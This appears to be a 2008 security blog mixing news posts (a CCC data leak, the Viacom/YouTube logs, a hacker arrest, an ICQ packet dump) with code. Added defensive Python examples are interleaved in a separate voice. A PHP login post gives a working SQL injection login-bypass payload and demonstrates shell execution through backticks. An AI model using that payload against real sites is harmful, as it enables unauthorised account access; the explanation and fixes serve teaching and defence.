#include <winsock2.h>   /* must come before windows.h, otherwise windows.h pulls in the old winsock.h */
#include <windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* windows.h already defines MAX_PATH (260); only define it if it is missing */
#ifndef MAX_PATH
#define MAX_PATH 512
#endif
#define PORT 80

SOCKET sock;
SOCKADDR_IN remote_addr;

Then we have a function to set the host (it could also be used to get the IP out of a hostname; see the commented-out lines):

//u_long getip(const char *host)
void sethost(const char *host)
{
    struct hostent *hp;
    u_long host_ip;

    memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons(PORT);

    /* first try to parse host as a dotted-quad IP address */
    host_ip = inet_addr(host);

    if (host_ip == INADDR_NONE)
    {
        /* not an IP literal: resolve the name and take its first address */
        if ((hp = gethostbyname(host)) != NULL)
        {
            //host_ip = *(u_long *)hp->h_addr_list[0];
            memcpy(&remote_addr.sin_addr, hp->h_addr_list[0], hp->h_length);
        }
    }
    else
    {
        /* IP literal: use it directly (previously remote_addr stayed empty here) */
        remote_addr.sin_addr.s_addr = host_ip;
    }

    /* the socket itself is created once in main(); creating a second one
       here would leak the first */

    //return host_ip;
}

And finally the main() function to send the GET Request:

int main()
{
    WSADATA wsaData;

    char buffer[MAX_PATH];
    char recvbuff[MAX_PATH];
    int recvbufflen = MAX_PATH;
    int res;

    if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0)
        return 1;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    sethost("www.example.com");

    if (connect(sock, (SOCKADDR*)&remote_addr, sizeof(SOCKADDR)) == SOCKET_ERROR)
    {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    sprintf(buffer, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
    send(sock, buffer, strlen(buffer), 0);

    /* leave room for the terminating NUL so the reply can be used as a C string */
    res = recv(sock, recvbuff, recvbufflen - 1, 0);
    if (res > 0)
    {
        recvbuff[res] = '\0';
        // do stuff here ...
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}

In future I will blog a bit more about this if it goes further!

05th - July - 2008 - 00:30

Data of 41000 citizens in the net


The Chaos Computer Club published news about a big data problem on the website of the market research institution TNS Infratest/Emnid. It was possible to get information about 41000 (maybe more) citizens who had worked with the institution. The problem was as simple as it was shocking and stupid. The URL of the website looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you at first only saw the details of that specific account, but when you just changed the "id" field it was possible to see the profile data of other citizens. With a simple Python script the CCC was able to get about 41000 data sets.

What is really shocking is how detailed those reports were. Your email address was in there, your date of birth, your phone number. Furthermore very sensitive data could be seen, like your income, your job, your health insurance, your bank details, the credit cards you use and much more...

How was the CCC able to get at this information, did they hack into it? No, not really... They got a mail with a valid account and looked closer at the website. That simple, that shocking.
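To show what was missing on that site, here is an added example of mine (not code from the post or from the CCC): a record lookup that checks ownership on the server side instead of trusting the "id" from the URL, plus a small log check that flags a session walking through ids the way the CCC's script did. The record table, the owner field, the session names and the log lines are all constructed for this example; only the URL shape comes from the post.

```python
"""Ownership check for masterdata.aspx-style lookups and a log-based
enumeration check. Added example; all names and sample data are constructed."""
from collections import defaultdict
import re

# Constructed "member data" keyed by numeric id. "owner" is the account that
# is allowed to read the record (hypothetical schema, not the real site's).
RECORDS = {
    110001: {"owner": "alice", "email": "alice@example.org"},
    110002: {"owner": "bob", "email": "bob@example.org"},
    110003: {"owner": "carol", "email": "carol@example.org"},
}


def get_masterdata_vulnerable(session_user, record_id):
    """The pattern the post describes: any logged-in user may read any id."""
    return RECORDS.get(record_id)


def get_masterdata_safe(session_user, record_id):
    """Authorize on the server: the id from the query string is untrusted input,
    so the record is only returned when it belongs to the logged-in account."""
    rec = RECORDS.get(record_id)
    if rec is None or rec["owner"] != session_user:
        return None  # answer as if the record does not exist
    return rec


LOG_LINE = re.compile(r"^(?P<session>\S+) GET .*\bid=(?P<id>\d+)")

# Constructed access log: sess-a reads its own record once, sess-b walks ids.
SAMPLE_LOG = """\
sess-a GET /pages/business/masterdata.aspx?fromWhere=base&id=110001 200
sess-b GET /pages/business/masterdata.aspx?fromWhere=base&id=110001 200
sess-b GET /pages/business/masterdata.aspx?fromWhere=base&id=110002 200
sess-b GET /pages/business/masterdata.aspx?fromWhere=base&id=110003 200
sess-b GET /pages/business/masterdata.aspx?fromWhere=base&id=110004 200
"""


def flag_enumeration(log_text, threshold=3):
    """Return the sessions that requested at least `threshold` distinct ids;
    a normal member only ever asks for its own record."""
    ids_by_session = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            ids_by_session[m["session"]].add(int(m["id"]))
    return sorted(s for s, ids in ids_by_session.items() if len(ids) >= threshold)


if __name__ == "__main__":
    print(get_masterdata_vulnerable("alice", 110002))  # bob's record leaks
    print(get_masterdata_safe("alice", 110002))        # None
    print(flag_enumeration(SAMPLE_LOG))                # ['sess-b']
```

The threshold is deliberately low because a legitimate user of such a site has exactly one id; the real fix is the ownership check, the log check only tells you when it was missing.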


The original article at [www.ccc.de].

04th - July - 2008 - 04:30

All your data are belong to us


Not being in the best mood anyway, I just came across a news item on the blog of wired.com which really shocked me: all YouTube logs have to be handed over to a company called Viacom. The logs amount to 4 terabytes, including user names and IP addresses, all the videos they have watched and everything they did on the YouTube website. Viacom filed suit against Google in March 2007 for allowing users to upload copyright-protected material to YouTube and claims damages of 1 billion USD. Now Google is forced to hand over ALL its logs to Viacom, who want to prove with this that people watch a lot of copyright-protected material, more than free material.

Viacom wanted even more: a copy of every video marked as private, and more. This has been denied, but nevertheless the story is quite shocking to me. What is this all going to become in future? The whole concept of Web 2.0 seems at risk as companies force websites to shut down if they feel that copyright laws are broken. This case is a perfect example of this, and it's even worse that Viacom now has the right to get the logs, decided by a court on Wednesday.

What is all this going to become in future? Are all those great projects forced down by companies? That would be very bad, as it would turn the internet into something else than it is now.


Original post: [blog.wired.com].

03rd - July - 2008 - 00:30

CFP for 25c3 opened now


The Call For Participation/Papers for the annual congress of the Chaos Computer Club has opened. You can now hand in the ideas you would like to give a talk or workshop about, or whatever else. The topics are as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:

Criteria by which we assess a lecture

* we consider the topic in general relevant for the participants
* we consider the topic currently relevant for the participants
* we consider the topic interesting, fun and worthy to be known more about
* the lecture is about something the speaker made himself
* we think the lecture might be fun
* the lecture is part of a workshop (has a second part which is a workshop)
* the lecture presents something new
* the more information provided about the lecture and the speaker the better

The following "Dates and Deadlines" have been set:

* October 5th, 2008 (Midnight UTC) Submission due
* November 7th, 2008 (Midnight UTC) Final notification of acceptance (or earlier)
* November 28th, 2008 (Midnight UTC) Final papers due
* December 27th - 30th, 2008 Chaos Communication Congress

To submit something go to [cccv.pentabarf.org/submission/25C3].

02nd - July - 2008 - 20:00

The "Jonny Hell" case


It's been quite a while since a top story about a hacker found its way into the media, but now it has happened again. Talking to my father tomorrow, he told me that he had read a story in the newspaper about a guy called Aleksandr Suvorov, better known on the internet as "Jonny Hell", who was caught at Frankfurt (Main) International Airport by US Secret Service agents and taken to prison. I also read it on the internet, coming across "Spiegel Online". The story is very interesting for several reasons.

First of all it has to be said that some newspapers speak of Aleksandr Suvorov as the world's most wanted hacker (which is typical for the media, to make it more shocking *no comment*), and for sure he is a big fish that they got, no question. "Spiegel Online" talks of millions of stolen credit cards that caused damage to people and companies of more than 100 million USD. Some other newspapers talk of only a few million. All in all the story is not totally clear, and the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:

Jonny Hell's is not a case like every other one. Many things are unclear, and the way his seizure happened is against the law! That has to be stated. Secret Service agents have NO right to catch a person on German ground and take him to prison. Furthermore the warrant of arrest for installing a trojan (packet sniffer) on the restaurant's computer was issued on the 12th of March this year, one week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story reaches the public newspapers. It takes months until people are informed about what happened.

Let me make a cut here in the story of "Jonny Hell" and turn around. Is this really a rare case? Did this only happen to him, and because he is SO DANGEROUS? Or can this happen to every little and small fish out there, evil or not, guilty or not? The answer is simple: it can happen to everyone, and it did. If you are part of the German hacker community you should still know it; if not, I will tell you. A person known under the handle Rembrandt was caught similarly, but much more rudely, on the 22nd of March 2007 in a restaurant in Berlin by agents who did not even say who they were or what they wanted. They took him with them in a car and brought him to a place he did not know, with no chance to find out where he was. He had to sign a statement to be set free, and they told him that if he did not sign it, they could keep him for days and longer. They wanted to scare him and make him admit that he had hacked into the network of the Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of your apartment being raided, being kept in a prison without the right to call a lawyer, and more, are worse than a charge could be. Your chances of getting a well-paid job in the security industry are almost zero.

Think about it: do you still think democracy works? Do you think it is more than a word written on paper? If yes, why can it happen that people get caught by agents who have no right to do so and won't face consequences for it? Why can it happen that people are forced to sign a statement without speaking to a lawyer, without knowing what is actually going on, without PROOF!? ... Take a moment, think about it.

02nd - July - 2008 - 02:00

Why ICQ sucks


I was at work today, chatting with some friends on ICQ. Around 18:00 I went home and wanted to log in to my account again, which resulted in an error message from Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http://pidgin.im/". I guess millions have seen this message, and the site was no longer reachable; could be a logical DDoS, whatever. To make Pidgin work again you would have to recompile the whole program and change a value in the header file oscar.h from 0x010a to 0x010b. For Linux users this might work out, but for Windows it is really annoying. So, why does ICQ do this? Simple answer: they want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you check the whole thing with Wireshark while connecting you will get to see something like this (tip: look for the *.exe, that is what they want you to download and install):

Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 655
    Identification: 0x8aa2 (35490)
    Flags: 0x04 (Don't Fragment)
    Fragment offset: 0
    Time to live: 105
    Protocol: TCP (0x06)
    Header checksum: 0xb325 [correct]
    Source: 64.12.161.153 (64.12.161.153)
    Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
    Source port: aol (5190)
    Destination port: 11234 (11234)
    Sequence number: 11    (relative sequence number)
    [Next sequence number: 626    (relative sequence number)]
    Acknowledgement number: 102    (relative ack number)
    Header length: 20 bytes
    Flags: 0x18 (PSH, ACK)
    Window size: 16384
    Checksum: 0x7577 [correct]
        [Good Checksum: True]
        [Bad Checksum: False]
    [SEQ/ACK analysis]
    [PDU Size: 615]
AOL Instant Messenger
    Command Start: 0x2a
    Channel ID: Close Connection (0x04)
    Sequence Number: 26668
    Data Field Length: 609
    TLV: Unknown
        Value ID: Unknown (0x008e)
        Length: 1
        Value
    TLV: Screen name
        Value ID: Screen name (0x0001)
        Length: 9
        Value: 410996901
    TLV: BOS server string
        Value ID: BOS server string (0x0005)
        Length: 17
        Value: 64.12.25.112:5190
    TLV: Authorization cookie
        Value ID: Authorization cookie (0x0006)
        Length: 256
        Value
    TLV: Error Code
        Value ID: Error Code (0x0008)
        Length: 2
        Value: 28
    TLV: Error URL
        Value ID: Error URL (0x0004)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Build
        Value ID: Latest Beta Build (0x0040)
        Length: 4
        Value: 11
    TLV: Latest Beta Name
        Value ID: Latest Beta Name (0x0043)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Beta URL
        Value ID: Latest Beta URL (0x0041)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Info
        Value ID: Latest Beta Info (0x0042)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
    TLV: Latest Release Build
        Value ID: Latest Release Build (0x0044)
        Length: 4
        Value: 11
    TLV: Latest Release Name
        Value ID: Latest Release Name (0x0047)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Release URL
        Value ID: Latest Release URL (0x0045)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Release Info
        Value ID: Latest Release Info (0x0046)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
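To make the dump above readable without Wireshark, here is an added example of mine (not code from the post, from Pidgin or from ICQ): a minimal parser for the FLAP frame and TLV list that the server sends on channel 4 (close connection). It is run on a frame I constructed to carry the same TLV types and values as the dump (screen name, BOS server, error code 28, error URL, release build); the TLV names are the ones Wireshark printed. The sanity checks on the length fields are what a client should do before trusting anything in such a frame.

```python
"""FLAP frame / TLV parser for the close-connection message in the dump above.
Added example; the frame below is constructed, not a capture."""
import struct

FLAP_START = 0x2A
CHANNEL_CLOSE = 0x04

# TLV names as Wireshark labelled them in the dump
TLV_NAMES = {
    0x0001: "Screen name",
    0x0004: "Error URL",
    0x0005: "BOS server string",
    0x0008: "Error Code",
    0x0044: "Latest Release Build",
}


def build_tlv(tlv_type, value):
    """TLV = 16-bit type, 16-bit length, value (all big-endian, as in OSCAR)."""
    return struct.pack("!HH", tlv_type, len(value)) + value


def build_flap(channel, seq, payload):
    """FLAP header = start byte 0x2a, channel, 16-bit sequence, 16-bit length."""
    return struct.pack("!BBHH", FLAP_START, channel, seq, len(payload)) + payload


# Constructed frame mirroring the dump: channel 4, sequence 26668, and the
# TLVs that matter for the forced upgrade.
SAMPLE_FRAME = build_flap(
    CHANNEL_CLOSE, 26668,
    build_tlv(0x0001, b"410996901")
    + build_tlv(0x0005, b"64.12.25.112:5190")
    + build_tlv(0x0008, struct.pack("!H", 28))
    + build_tlv(0x0004, b"http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe")
    + build_tlv(0x0044, struct.pack("!I", 11)))


def parse_flap(data):
    """Return (channel, seq, tlvs) for one FLAP frame; tlvs maps type -> bytes.
    Every length field is checked against the bytes actually present, so a
    malformed frame raises ValueError instead of being read past its end."""
    if len(data) < 6:
        raise ValueError("short FLAP header")
    start, channel, seq, length = struct.unpack("!BBHH", data[:6])
    if start != FLAP_START:
        raise ValueError("bad FLAP start byte 0x%02x" % start)
    if len(data) != 6 + length:
        raise ValueError("FLAP length %d but %d payload bytes" % (length, len(data) - 6))
    payload, pos, tlvs = data[6:], 0, {}
    while pos < len(payload):
        if pos + 4 > len(payload):
            raise ValueError("truncated TLV header at offset %d" % pos)
        tlv_type, tlv_len = struct.unpack("!HH", payload[pos:pos + 4])
        value = payload[pos + 4:pos + 4 + tlv_len]
        if len(value) != tlv_len:
            raise ValueError("TLV 0x%04x claims %d bytes, %d present" % (tlv_type, tlv_len, len(value)))
        tlvs[tlv_type] = value
        pos += 4 + tlv_len
    return channel, seq, tlvs


def is_well_formed(data):
    try:
        parse_flap(data)
        return True
    except ValueError:
        return False


def describe_close(data):
    """Summarise a channel-4 frame: which account was disconnected, the error
    code, and where the server points the client. Returns None for other channels."""
    channel, seq, tlvs = parse_flap(data)
    if channel != CHANNEL_CLOSE:
        return None
    return {
        "seq": seq,
        "screen_name": tlvs.get(0x0001, b"").decode("ascii"),
        "error_code": struct.unpack("!H", tlvs[0x0008])[0] if 0x0008 in tlvs else None,
        "error_url": tlvs.get(0x0004, b"").decode("ascii"),
        "release_build": struct.unpack("!I", tlvs[0x0044])[0] if 0x0044 in tlvs else None,
        "tlv_names": [TLV_NAMES.get(t, "Unknown 0x%04x" % t) for t in tlvs],
    }


if __name__ == "__main__":
    for k, v in describe_close(SAMPLE_FRAME).items():
        print("%-14s %s" % (k, v))
```

The point for a client author: the URL in the Error URL TLV arrives over plain TCP from whatever answered on port 5190, so a client that offers to fetch and run the .exe from that field is trusting the network, not the vendor.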
	
01st - July - 2008 - 15:30

Code Injection? (2)

Last month I talked about a possible Code Injection in a PHP file, which did not occur, as I found out with some help from another person. Then this person suggested that a stacked query could work to inject SQL commands, but this did not work either, because mysql_query() does not allow stacked queries. All about this you can find in the [archive]. But why do I write about it again? Because there is a possible way to inject SQL commands and bypass the script! Let's look at it again. This is the script:

[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]

So how can we bypass this script? Let's assume that the table "member" has two columns: "Anmeldename" and "Passwort". So the table should look like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | unknown to us                    |
+-------------+----------------------------------+

So, now the interesting things are the last two lines. The password gets hashed with MD5 and is saved to $spw. Then the most interesting part comes in. The first row returned by mysql_fetch_object() is searched for the field "Passwort" and that value is compared to the MD5 hash of the POSTed password. Okay, let's not talk endlessly, here is the injection:

Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', \
'9990775155c3518a0d7917f7780b24aa

Passwort: ttt

What happens here? If the injection works, the query will finally look like this: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'". Which will result in a table looking like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | 9990775155c3518a0d7917f7780b24aa |
+-------------+----------------------------------+

And now we give the password "ttt" to the script, which is "9990775155c3518a0d7917f7780b24aa" as an MD5 hash! So finally "if($zeile->Passwort==$spw)" becomes "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)" and that is TRUE, which results in? Guess? Yep, you are logged in!

Thanks go to [WildCat], who has tested this for me and can say for sure that it works under PHP 5 plus MySQL 5!
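Here is an added example of mine (not from the post, not WildCat's test) that rebuilds the login logic of the PHP snippet in Python on an in-memory SQLite database, so the bypass and the fix can be run next to each other. The table, the admin account and its hash are constructed; the MD5 of "ttt" is computed rather than copied. SQLite only accepts LIMIT at the end of a compound SELECT, so the payload leaves out the post's LIMIT 0 (that clause only drops rows for a matching name, and "x" matches none). The fix is the usual one: bind the name as a parameter so it can never become SQL, and then the only row the hash is compared against is the one for that account.

```python
"""The PHP login from the post, in Python on SQLite: string-built query beside
a parameterised one. Added example; table and hashes are constructed."""
import hashlib
import sqlite3


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE member (Anmeldename TEXT, Passwort TEXT)")
    # constructed admin row; its password is "unknown to us" in the post
    con.execute("INSERT INTO member VALUES (?, ?)",
                ("admin", md5_hex("correct horse")))
    return con


def login_vulnerable(con, anmeldename, passwort):
    """Mirrors the PHP: the name is pasted into the SQL, the first row wins,
    and whatever sits in its Passwort column is compared to md5(passwort)."""
    sql = "SELECT * FROM member WHERE Anmeldename='%s'" % anmeldename
    zeile = con.execute(sql).fetchone()
    return zeile is not None and zeile[1] == md5_hex(passwort)


def login_safe(con, anmeldename, passwort):
    """Parameter binding: the driver sends the name as data, so a quote or a
    UNION in it is just characters, and the stored hash is the real one."""
    zeile = con.execute(
        "SELECT Passwort FROM member WHERE Anmeldename = ?", (anmeldename,)
    ).fetchone()
    return zeile is not None and zeile[0] == md5_hex(passwort)


# The post's payload (minus LIMIT 0): make the first returned row one whose
# "Passwort" column is the hash of a password the sender chose ("ttt").
PAYLOAD = "x' UNION ALL SELECT 'admin', '%s" % md5_hex("ttt")


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, payload:", login_vulnerable(con, PAYLOAD, "ttt"))   # True
    print("vulnerable, honest: ", login_vulnerable(con, "admin", "ttt"))   # False
    print("safe, payload:      ", login_safe(con, PAYLOAD, "ttt"))         # False
```

Binding the parameter is the fix for the injection; storing plain MD5 of passwords is a separate weakness that the post does not address.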


UPDATE: Once again I have to update this news (seems like they never want to end). Veda messaged me again and told me it will work as a Code Injection if you use backticks. As a proof of concept he opened up the PHP interpreter on his local machine and did the following:

% php -a
php > print md5();

Warning: md5() expects at least 1 parameter, 0 given in php shell \
code on line 1
php > print md5(x);
9dd4e461268c8034f5c8564e155c67a6
php > print md5(`mkdir foo`);
[...]
% ls
foo

No comment from my side! I hope that's it! EOF!


UPDATE 2: So another update... I won't comment on this anymore, look for yourself:

joern@heaven:~$ cat test.php 
<?

$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch  skyout-fail`)."\n";;
echo md5($string)."\n";;

?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$